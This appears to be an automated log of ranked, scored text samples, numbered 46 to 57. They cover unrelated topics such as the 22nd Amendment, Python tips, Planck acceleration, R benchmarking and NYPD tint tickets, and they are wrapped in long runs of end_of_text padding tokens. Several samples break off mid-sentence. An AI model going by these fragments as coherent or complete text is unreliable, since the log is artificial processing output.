guess!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 46; Score = 1036288.0 +<|begin_of_text|>What is the 22nd Amendment? + +The 22nd Amendment to the United States Constitution sets term limits for the elected President of the United States. Passed by the United States Congress on March 21, 1947, the 22nd Amendment was later ratified by the requisite number of states on the 27th of February in 1951. + +The 22nd Amendment states that no personal shall be elected to the office of the President more than twice and no person who has already held office—or acted as the president of the United States—for more than two years of a term shall be elected President more than once. + +The primary motive of this amendment was to establish term limits; the 22nd Amendment to the United States Constitution states that no US President shall be elected to more than two terms. Furthermore, the 22nd Amendment limits the maximum time an individual may be serve as President to 10 years, if the person should succeed to the office. + +Original Text of the 22nd Amendment to the United States Constitution: + +Section 1. No person shall be elected to the office of the President more than twice, and no person who has held the office of President, or acted as President, for more than two years of a term to which some other person was elected President shall be elected to the office of the President more than once. But this article shall not apply to any person holding the office of President when this article was proposed by the Congress, and shall not prevent any person who may be holding the office of President, or acting as President, during the term within which this article becomes operative from holding the office of President or acting as President during the remainder of such term. + +Section 2. This article shall be inoperative unless it shall have been ratified as an amendment to the Constitution by the legislatures of three-fourths of the several States within seven years from the date of its submission to the States by the Congress. + +History of the 22nd Amendment: + +Historians cite George Washington’s unwillingness to seek office for a third term as evidence that the founding fathers saw the two-term limit as conventional. The constraint was instituted to impede the development of pseudo monarchy. + +In addition to Washington, Thomas Jefferson also contributed to the two-term limit by suggesting an office without restraints could yield a “a President for life”, which would obfuscate the premise of a democratic government. + +Comments + +comments<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 47; Score = 1032192.0 +<|begin_of_text|>Hi there folks. It’s been a long time since I last published a post. I have been busy. However in this post I am going to share some really informative tips and tricks which you might not have known about. So without wasting any time lets get straight to them: + +Enumerate + +Instead of doing: + +i = 0 for item in iterable: print i, item i += 1 + +We can do: + +for i, item in enumerate(iterable): print i, item + +Enumerate can also take a second argument. Here is an example: + +>>> list(enumerate('abc')) [(0, 'a'), (1, 'b'), (2, 'c')] >>> list(enumerate('abc', 1)) [(1, 'a'), (2, 'b'), (3, 'c')] + +Dict/Set comprehensions + +You might know about list comprehensions but you might not be aware of dict/set comprehensions. They are simple to use and just as effective. Here is an example: + +my_dict = {i: i * i for i in xrange(100)} my_set = {i * 15 for i in xrange(100)} # There is only a difference of ':' in both + +Forcing float division: + +If we divide whole numbers Python gives us the result as a whole number even if the result was a float. In order to circumvent this issue we have to do something like this: + +result = 1.0/2 + +But there is another way to solve this problem which even I wasn’t aware of. You can do: + +from __future__ import division result = 1/2 # print(result) # 0.5 + +Voila! Now you don’t need to append.0 in order to get an accurate answer. Do note that this trick is for Python 2 only. In Python 3 there is no need to do the import as it handles this case by default. + +Simple Server + +Do you want to quickly and easily share files from a directory? You can simply do: + +# Python2 python -m SimpleHTTPServer # Python 3 python3 -m http.server + +This would start up a server. + +Evaluating Python expressions + +We all know about eval but do we all know about literal_eval? Perhaps not. You can do: + +import ast my_list = ast.literal_eval(expr) + +Instead of: + +expr = "[1, 2, 3]" my_list = eval(expr) + +I am sure that it’s something new for most of us +================================================================================ +Rank = 48; Score = 1024000.0 +<|begin_of_text|>When there are nine + +Sara Haider Blocked Unblock Follow Following Feb 2, 2016 + +You can’t be what you can’t see, and I see a lack of women leaders in my industry. + +Despite good intentions from most people, unconscious bias and structural inequality still leads us to a world where women and minorities are extremely underrepresented in Silicon Valley. We can do better. + +After being in this industry for almost a decade, I’ve learned that given the existing inequalities, the only way to make real change is to go out of your way to do so. It’s important to acknowledge that there is already bias in your criteria, whether for hiring, promoting, or investing. So you must go out of your way to champion women and underrepresented minorities. + +I don’t tweet about it a lot, but I’m an active angel investor. In the last three years, I’ve made nine investments, and three of them were in companies with women CEOs. 33% doesn’t feel good enough, though sadly this is likely higher than the ratio for most venture firms and angels. So I’ve decided to take it one step further. + +I’m committing that the next nine angel investments I make will only be in companies run by women CEOs, without exception. + +Recently, I’ve become a Sequoia Scout, so some of my investments will involve Sequoia’s capital. But my promise to only invest in women stands whether or not the funds are from my personal capital or Sequoia’s. + +I think Supreme Court Justice Ruth Ginsburg sums it up quite nicely:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 49; Score = 1019904.0 +<|begin_of_text|>Can you solve these puzzles about differentiation and integration? + +Click to share on Reddit (Opens in new window) + +Click to share on Facebook (Opens in new window) + +Click to share on Twitter (Opens in new window) + +Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use. + +To find out more, including how to control cookies, see here: Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use.To find out more, including how to control cookies, see here: Cookie Policy + +When learning A-level maths, much time is devoted to learning how to differentiate and integrate. For this week’s blog post, I have collected some puzzles based on these skills. They should be fun to solve, present a few surprises and maybe even provide a teacher or two with an extra challenge for capable students. + +The answers to these puzzles will appear here from Sunday at 8am. + +Let’s start with an integral: + +An Integral Source: mscroggs.co.uk + +What is + +$$\int_0^{\frac\pi2}\frac1{1+\tan^ax}\,dx?$$ + +This might look difficult to you. You might first start by substituting in some specific values for $a$, and this would be a good way to start, but solving the integral in general is difficult. However, considering the second integral $$\int_0^{\frac\pi2}\frac1{1+\cot^ax}\,dx$$ along with the integral in the question should help. + +Before I say too much, I’m going to stop and leave any further discussion of this puzzle for the answers [available from Sunday 8am]. + +Next, let’s have a go at a few derivatives: + +$x$ to the power of $x$ to the power of $x$ to the power of … Source: mscroggs.co.uk + +Let $\displaystyle y=x^{x^{x^{x^{.^{.^.}}}}}$ (with an infinite chain of powers of $x$).What is $\displaystyle \frac{dy}{dx}$? + +Differentiate this Source: Alex Bolton + +Let $\displaystyle a=\frac{\ln(\ln x)}{\ln x}$. Let $b=x^a$. Let $\displaystyle y=e^b$. What is $\displaystyle \frac{dy}{dx}$? + +Finally, the last puzzle of this blog post asks you to find all functions whose integr +================================================================================ +Rank = 50; Score = 1011712.0 +<|begin_of_text|>The Planck acceleration is the acceleration from zero speed to the speed of light during one Planck time. It is a derived unit in the Planck system of natural units. + +Formula and value [ edit ] + +Planck acceleration may be stated as + +a P = c t P = 299792458 m / s 5.39116 × 10 − 44 s {\displaystyle a_{\text{P}}={\frac {c}{t_{\text{P}}}}={\frac {299792458\ m/s}{5.39116\times 10^{-44}\ s}}} + +≈ 5.560815 × 10 51 m / s 2 {\displaystyle \approx 5.560815\times 10^{51}\ m/s^{2}} + +≈ 5.670453 × 10 50 g {\displaystyle \approx 5.670453\times 10^{50}\ g} + +where a P is the Planck acceleration, c is the speed of light, t P is the Planck time[1] and g is the standard acceleration of gravity.[2] + +Meaning [ edit ] + +The Planck acceleration is the highest acceleration conceivable in the Universe, as the speed of light is the highest possible speed and the Planck time is the shortest possible duration of any meaningful physical process. This limitation does assume that relativity has natural units. However, it is not clear whether any object in the Universe actually reaches or can reach the Planck acceleration. One event where the Planck acceleration was possibly reached was the Big Bang, in regard to the acceleration of the expanding Universe during the Planck epoch. Also, within a black hole, such acceleration might be possible beyond its horizon, but that is certainly unknown (and what lies beyond a horizon is beyond the reach of physical observation). + +In a classical description, photons emanating from their subluminal source (for example, a particle-antiparticle collision) experience zero acceleration, as they always travel at the speed of light. However, since the Planck time is the least conceivable delay, the "instantaneous" production of a photon pair can not be distinguished from the acceleration of a photon from zero to the speed of light in a Planck time, thereby achieving a Planck acceleration. In other words, nothing higher than the Planck acceleration can be measured, since that would imply measuring a time interval shorter than the Planck time. + +As with other quantities at the Planck scale, the physics of +================================================================================ +Rank = 51; Score = 995328.0 +<|begin_of_text|>How much is 1 byte, kilobyte, megabyte, gigabyte, etc.? + +Below is a list of each of the accepted disk drive space values. It is important to realize that not all manufacturers and developers list their value using binary, which is base 2. For example, a manufacturer may list a product's capacity as one gigabyte (1,000,000,000 bytes, a metric value) and not 1,073,741,824 bytes (gibibyte) that it actually is. For this page, we are using the "common names" and listing all values in base 2. + +Note: All values are listed as whole numbers, which means a GB shows it can only contain one 650 MB CD. Technically, 1 GB could hold 1.5753 CDs worth of data, but this document isn't meant to show you how many "parts" of an object a value can hold. Therefore, we are omitting decimal values. More plainly, you can only fit one complete 650 MB CD on a 1 GB drive since two full 650 MB discs exceed 1 GB. + +Tip: Except for a bit and a nibble, all values explained below are in bytes and not bits. For example, a kilobyte (KB) is different than a kilobit (Kb). When referring to storage, bytes are used whereas data transmission speeds are measured in bits. + +Bit + +A bit is a value of either a 1 or 0 (on or off). + +Nibble + +A nibble is 4 bits. + +Byte + +Today, a byte is 8 bits. + +1 character, e.g., "a", is one byte. + +Kilobyte (KB) + +A kilobyte is 1,024 bytes. + +2 or 3 paragraphs of text. + +Megabyte (MB) + +A megabyte is 1,048,576 bytes or 1,024 kilobytes. + +873 pages of plain text (1,200 characters). + +pages of plain text (1,200 characters). 4 books (200 pages or 240,000 characters). + +Gigabyte (GB) + +A gigabyte is 1,073,741,824 (230) bytes. 1,024 megabytes, or 1,048,576 kilobytes. + +894,784 pages of plain text (1,200 characters). + +pages of plain text (1,200 characters). 4,473 books (200 pages or 240,000 +================================================================================ +Rank = 52; Score = 991232.0 +<|begin_of_text|>This election marked the first time the American League award went to someone who was in his first full season as a manager and the fifth time overall. The other four first-year winners were in the National League: Hal Lanier with the Houston Astros in 1986, Dusty Baker with the San Francisco Giants in 1993, Joe Girardi with the Florida Marlins in 2006 and Matt Williams with the Washington Nationals in 2014. + +Banister was the third Rangers manager honored. The others were Johnny Oates, who was tied with the New York Yankees’ Joe Torre in 1996, and Buck Showalter in 2004. + +No manager was named to every ballot. + +Ballots from two writers in each league city prior to postseason play are tabulated on a system that rewards five points for first place, three points for second place and one point for third place. + +2015 AL Manager of the Year + +Manager, Team First Second Third Points Jeff Banister, Rangers 17 8 3 112 A.J. Hinch, Astros 8 13 3 82 Paul Molitor, Twins 2 3 14 33 John Gibbons, Blue Jays 1 5 2 22 Joe Girardi, Yankees 2 2 12 Ned Yost, Royals 1 5 8 Mike Scioscia, Angels 1 1 + +Below is a breakdown of the 30 individual ballots, submitted by two writers representing each city in the American League. Note that in some cases (*), when a city does not have enough eligible voters, a voter from another city represents that chapter. For more information on the voting, see our Voting FAQ.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 53; Score = 991232.0 +<|begin_of_text|>Share + +Fresh grime styles. + +On the cover for his new album, Safe, Louis Carnell looks like he's just awoken from a cryogenic freeze. It's an appropriate image. His tracks as Visionist sound as if they were made in an icy cave. Carnell uses wordless vocal samples and glassy synths to create an ethereal, almost choral take on grime. The South Londoner has been honing his style for the last few years, releasing on respected, boundary-pushing labels like Lit City Trax, Diskotopia, Leisure System and Left Blank. He's been a key name in the recent wave of creativity that's swept instrumental grime, but instead of focusing on rhythmic innovation or experimental sonics like many of his peers, Carnell's channelled emotions. On the two-part I'm Fine series he explored the five stages of grief: denial, anger, bargaining, depression and acceptance. "The sharply honed dance music motifs that swim in the vast space seem untethered from any club context, instead pointing in on themselves," said Maya Kalev in her review of Part II. Similarly, Safe, which is released this week through PAN, sees Carnell confronting his struggles with anxiety. "I needed to make it a challenging listen to reflect this," he says below. The album's 15 tracks push Carnell's template further than ever before—the beats are tougher, the vocals more dense, the atmospheres chillier. + +Along with his own work, Carnell is doing plenty to keep grime and its offshoots moving forward. His Lost Codes label gave early releases to trailblazers like Filter Dread, Sd Laika, Bloom and Acre, and the imprint was recently reborn as CODES, with PAN's Bill Kouligas coming on board. On RA.488 Carnell showcases plenty of artists in this ilk alongside cuts from Safe, resulting in a 42-minute, 27-track sonic blast. + +What have you been up to recently? + +Since the album finished, I have been working hard on my upcoming live shows. The first one is premiering at Unsound festival next week. Also keeping it busy with a lot of upcoming releases and new artists we're working with for our new label CODES, which I co-run with Bill from PAN. + +How and where was the mix recorded? + +It was recorded live straight in Logic, on CDJs and Serato in my flatmate's room. + +Can you tell us about the idea behind the mix? + + +================================================================================ +Rank = 54; Score = 978944.0 +<|begin_of_text|>Share + +As recent graduate Pieter Smakman explained in a guest post in Sparkisan, “body parts are still very hard to scan due to their agile nature.” Whereas static objects are relatively straightforward and simple, a human limb has many nuances that make them considerably more difficult to fully process and understand (from a machine’s point of view, that is). So to address this issue, Smakman “developed the first dedicated and low-cost 3D Hand Scanner.” + +With Raspberry Pis, laser pointers, and a total of 32 cameras, Smakman claims that his scanner “is able to create a precise surface model of the hand,” which in turn “opens a new world of possibilities: think of 3D printed braces, personalized medical instruments, and a long-awaited tool for everyone who designs products that interact with the human hand.” + +For now, this world is one that only exists in hypotheticals — Smakman’s design is one of a kind and has yet to be reproduced, much less made available to the general public. But if it ever does come to fruition, it’s sure to have a major impact on the way our hands (and the rest of our bodies) are able to interact with the world.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 55; Score = 978944.0 +<|begin_of_text|>In my experience, the default libRblas gives horrible performance across all of the platforms that I regularly use (Windows, Mac OS & Linux). The R package that I’m currently developing uses RcppEigen, which is not dependent on an efficient BLAS or LAPACK library. However, many other R packages do have this dependency. Therefore, I would recommend following the instructions in the R Installation and Administration guide to switch over to a more efficient implementation. Avraham Adler, Tony Fischetti and Zachary Mayer have written similar blog posts on this topic. I use the Accelerate Umbrella Framework (vecLib) on OS X and Intel MKL with icc on Linux. The following instructions describe how (and why) to install GotoBLAS for R on Microsoft Windows. + +As described in pp. 191-192 of “Seamless R and C++ Integration with Rcpp” (DOI: 10.1007/978-1-4614-6868-4), the lmBenchmark script can be used as a rough performance measurement for dense matrix algebra on any system. You need to install the packages RcppEigen and rbenchmark, then run: + +Rscript -e "source(system.file(\"examples\", \"lmBenchmark.R\", package = \"RcppEigen\"))" + +The output should look something like this (with default Rblas.dll): + +lm benchmark for n = 1650 and p = 875: nrep = 20 user system elapsed 2021.83 21.27 2043.75 test relative elapsed user.self sys.self 3 LDLt 1.000 4.70 4.54 0.17 7 QR 1.374 6.46 6.25 0.20 8 LLt 1.436 6.75 6.44 0.32 1 lm.fit 3.853 18.11 18.03 0.03 6 SymmEig 5.700 26.79 26.57 0.22 2 PivQR 9.783 45.98 26.75 19.20 9 arma 19.155 90.03 89.72 0.29 4 GESDD 19.313 90.77 90.53 0.22 5 SVD 184.362 866.50 865.94 0.39 10 GSL 188.672 886 +================================================================================ +Rank = 56; Score = 966656.0 +<|begin_of_text|>C# Plays Bejeweled Blitz iDanScott Blocked Unblock Follow Following Dec 24, 2015 Dat score 1,336,950… Totally legit. Kappa. As some of you reading this may or may not already know; over the past day or so I went from having the idea of creating a computer program that would essentially be able to play the popular arcade game Bejeweled Blitz on Facebook, to actually developing it. Now as hard as this problem sounds, it was surprisingly easy and fairly swift to solve. I broke it down in to 3 main steps: Identify the area in which the bejeweled game was being played. Identify what colour was in what square. Check for the possible directions you could move a colour to successfully make a line of 3. The first step was probably the most time consuming of them all as everything from there was just colour management. The Solution I came up with in the end for that was to take a screenshot of the entire screen, and then scan the image from top to bottom using a nested for loop until I found a funny shade of brown that only appears along the Top Edge of the bejeweled grid (for anyone wondering that colour is Color.FromArgb(255, 39, 19, 5)). Once this colour had been found using the bitmap.GetPixel(x, y) function, I broke out of both for loops and knew that was the point where the top left corner of the grid was. I could then use this to construct a rectangle which would extract the bejeweled grid from the full screenshot. The size of the rectangle was calculated using the size of the grid cells (40px², found that out using trusty old paint) multiplied by the amount of rows/columns there were (8, found that out using my eye balls). This resulted in the Rectangle size coming out at 320px². + +Obtaining the playable grid. + +So the next step from here was to identify what colour resides in what square. To do that I started off by creating a 2 dimensional array of colours (Or Color’s to be politically correct) that was 8 rows and 8 columns to match that of the playable grid. I then systematically looped through the 2 dimensional array of colours in a nested for of x and y values assigning the array the colour of the pixel at the Location (x * 40) + 20, (y * 40) + 22. The x value was decided as it +================================================================================ +Rank = 57; Score = 966656.0 +<|begin_of_text|>In the land of “broken windows” policing, it’s tinted windows that may land you in trouble. + +The New York City Police Department issued 74,345 tickets for tinted windows in 2014, an average of 204 per day, according to a recent analysis by the Police Reform Organizing Project, an advocacy group that focuses on what it sees as excessive policing. + +That number is higher than the number of stop-and-frisks, which totaled 47,345 over the same period. + +State law dictates that car windows must allow at least 70 percent of sunlight through, measured by a “tint meter” that officers carry. The maximum penalty for a violation is $150 or 30 days in jail. Ignorance of the law is no excuse: buying a car with too-dark windows can still lead to a ticket. + +“A driver needs unobstructed views of the roadway and other motorists,” said Stacy Wood, a spokeswoman for the state Department of Motor Vehicles. + +We Are Witnesses A portrait of the U.S. immigration system in 12 short films + +Critics see a law that disproportionately targets people of color and provides a pretext to churn revenue and fish for other violations or crimes. “It represents a form of heavy-handed and intrusive policing,” said Robert Gangi, founder of the Police Reform Organizing Project. + +Broken windows policing, promoted by NYPD Commissioner William Bratton, theorizes that rooting out low-level, quality-of-life violations, such as graffiti, prevents more serious crime. “Bratton has said ‘broken windows’ policing is driven by 911 and 311 calls. But people don’t call the cops about tinted windows,” said Gangi. + +NYPD spokesman Lt. John Grimpel said tinted windows can be dangerous to officers. “You can’t see into the car, so we would have no idea what’s going on inside when the windows are tinted,” he said, noting that people found guilty of having their windows too dark “aren’t going to get jail time.” + +As of this June, there were 37,974 violations doled out for tinted windows in 